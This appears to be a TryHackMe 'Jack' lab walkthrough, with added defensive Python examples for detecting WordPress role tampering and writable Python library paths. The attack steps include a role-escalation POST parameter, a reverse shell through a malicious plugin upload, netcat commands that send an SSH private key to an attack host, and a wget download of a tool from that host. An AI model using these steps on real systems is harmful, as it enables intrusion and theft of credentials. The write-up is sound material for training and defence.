TryHackMe — Jack — Walkthrough

INTRODUCTION

ENUMERATION

  • ap = All Plugins
  • at = All Themes
  • u = Enumerate Users
  • detection-mode = Since we're not worried about being detected, we can use aggressive mode, which occasionally returns more results at the cost of generating more noise.

EXPLOITATION

  1. Log into WordPress using the obtained credentials
  2. Select "Profile"
  3. Start Burp Suite (or the HTTP proxy of your choice) and begin capturing web traffic
  4. Select "Update Profile"
  5. In Burp Suite, look at the captured HTTP POST and append the string "&ure_other_roles=administrator" to the end of the POST body
  6. Click "Forward" to submit the HTTP request, then refresh the WordPress admin page; it now shows more admin options, including the "Plugins" menu
  7. Start your netcat listener
  8. Select "Plugins", then "Add New"
  9. Select "Upload Plugin"
  10. Select "Browse"
  11. Select your plugin zip file and click "Install Now"
  12. Click "Activate Now" and check your listener
  13. Ta F@#$king Da!!!
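The role change in steps 5 and 6 succeeds only because the role parameter is trusted as submitted rather than checked against what the requesting account is allowed to assign. The following is an added example, not code from the original walkthrough or from any WordPress plugin: a server-side check, in the shape a plugin or a reverse proxy in front of WordPress could apply, that refuses role-changing parameters on a profile update from anyone who is not already an administrator. The request representation (method, path, URL-encoded body, role taken from the session), the set of role-assigning roles and the profile paths are assumptions for the example; the sample requests are constructed.

```python
"""Detect self-service role escalation in WordPress profile updates.

Added example, not part of the original walkthrough. It models the check a
profile-update handler should perform: role-changing parameters are honoured
only when the authenticated account already holds a role that may assign roles.

Assumptions (not from the page): a request is a (method, path, URL-encoded
body, requester_role) tuple, and the role comes from the server-side session,
never from the request itself.
"""
from urllib.parse import parse_qs

# Form fields that change a user's role. "ure_other_roles" is the parameter
# appended in the walkthrough; "role" is WordPress's own field on the
# user-edit form.
ROLE_PARAMS = {"role", "ure_other_roles"}

# Roles that may assign roles at all (assumption: only administrators).
ROLE_ASSIGNERS = {"administrator"}

# Paths where profile updates are posted (assumed WordPress defaults).
PROFILE_PATHS = {"/wp-admin/profile.php", "/wp-admin/user-edit.php"}


def role_params_in_body(body: str) -> dict:
    """Return the role-related parameters present in a URL-encoded POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v for k, v in fields.items() if k in ROLE_PARAMS}


def is_role_escalation_attempt(method: str, path: str, body: str, requester_role: str) -> bool:
    """True when a non-administrator submits any role parameter on a profile update."""
    if method.upper() != "POST" or path not in PROFILE_PATHS:
        return False
    if not role_params_in_body(body):
        return False
    return requester_role not in ROLE_ASSIGNERS


def audit(requests) -> list:
    """Run the check over (method, path, body, requester_role) tuples; return the flagged ones."""
    return [r for r in requests if is_role_escalation_attempt(*r)]


# Constructed sample traffic: a normal profile update, the same update with
# the extra parameter appended, and an administrator legitimately setting a role.
SAMPLE_REQUESTS = [
    ("POST", "/wp-admin/profile.php",
     "action=update&user_id=3&nickname=wendy&email=w@example.com", "author"),
    ("POST", "/wp-admin/profile.php",
     "action=update&user_id=3&nickname=wendy&email=w@example.com&ure_other_roles=administrator", "author"),
    ("POST", "/wp-admin/user-edit.php",
     "action=update&user_id=3&role=editor", "administrator"),
]

if __name__ == "__main__":
    for req in audit(SAMPLE_REQUESTS):
        print("flagged:", req[3], "tried to set", role_params_in_body(req[2]))
```

The important design point is that `requester_role` is read from the session, not from the body: the whole bug on the page is that the role a user asks for is taken as the role they are granted. Logging the flagged requests also gives the server a clean detection signal for this kind of tampering.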

PRIVILEGE ESCALATION

  1. On the attack machine, start your netcat listener to receive the file: "sudo nc -nlvp 443 > id_rsa"
  2. On the target, send the file to the attack machine using netcat by issuing the following command: "nc -nv <ATTACK IP> 443 < id_rsa"
  3. Assign the correct permissions to the SSH key using the following command: "chmod 600 id_rsa"
  4. ssh -i id_rsa jack@<TARGET IP>
  5. On the attack machine, start a Python web server using "sudo python3 -m http.server 443"
  6. On the target, download the file to /tmp using "wget http://<ATTACK IP>:443/pspy64 -O /tmp/pspy64"
  7. chmod +x /tmp/pspy64
  8. /tmp/pspy64
  9. Start your listener on the attack machine: "sudo nc -nlvp 443"
  10. Edit the os.py file and add the following to the end of the file
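Step 10 only works because a file the root-run Python script imports, os.py, can be modified by an unprivileged user. The following is an added example, not code from the original walkthrough: a small audit script a defender can run on a host to find Python module files or directories on the interpreter's search path that are writable by group or others, or are not owned by the expected account. The `trusted_uid` parameter, the restriction to `.py` files and directories, and the demo tree built by `build_demo_tree` are assumptions for the example; nothing on disk is modified by the check itself.

```python
"""Find Python library files an unprivileged user could modify.

Added example, not part of the original walkthrough. A privileged interpreter
that imports a module from a writable location will execute whatever has been
written there, so every directory on sys.path and every .py file below it
should be owned by root and not writable by group or others.
"""
import os
import stat
import sys
import tempfile


def writable_by_others(st: os.stat_result) -> bool:
    """True if the group or world write bit is set on the inode."""
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def check_path(path: str, trusted_uid=0) -> list:
    """Return (path, reason) tuples for entries under `path` a non-root user could alter.

    Only directories and .py files are considered, since those are what an
    importing interpreter searches and loads. Pass trusted_uid=None to check
    permission bits only and skip the ownership test (assumption for the demo).
    """
    findings = []
    if not os.path.isdir(path):
        return findings
    for root, _dirs, files in os.walk(path):
        candidates = [root] + [os.path.join(root, f) for f in files if f.endswith(".py")]
        for entry in candidates:
            try:
                st = os.lstat(entry)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue  # the link target is checked wherever it actually lives
            if trusted_uid is not None and st.st_uid != trusted_uid:
                findings.append((entry, "owned by uid %d" % st.st_uid))
            elif writable_by_others(st):
                findings.append((entry, "mode %o allows group/other write" % stat.S_IMODE(st.st_mode)))
    return findings


def check_sys_path(trusted_uid=0) -> list:
    """Audit every directory on the interpreter's module search path."""
    findings = []
    for p in sys.path:
        if p:  # '' stands for the current directory and is not a library location
            findings.extend(check_path(p, trusted_uid))
    return findings


def build_demo_tree() -> tuple:
    """Construct a throwaway directory with one safe module and one world-writable os.py.

    Returns (base_dir, safe_file, writable_file). Demo fixture only.
    """
    base = tempfile.mkdtemp(prefix="pylib-audit-")
    safe = os.path.join(base, "helper.py")
    bad = os.path.join(base, "os.py")
    for name, mode in ((safe, 0o644), (bad, 0o666)):
        with open(name, "w") as fh:
            fh.write("# constructed demo module\n")
        os.chmod(name, mode)
    return base, safe, bad


if __name__ == "__main__":
    hits = check_sys_path()
    for entry, reason in hits:
        print(f"{entry}: {reason}")
    sys.exit(1 if hits else 0)
```

Run it as any user on the host; a non-zero exit status means at least one importable location is modifiable. On systems where Python is installed under a non-root service account, pass that account's uid as `trusted_uid` instead of relying on the root default.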
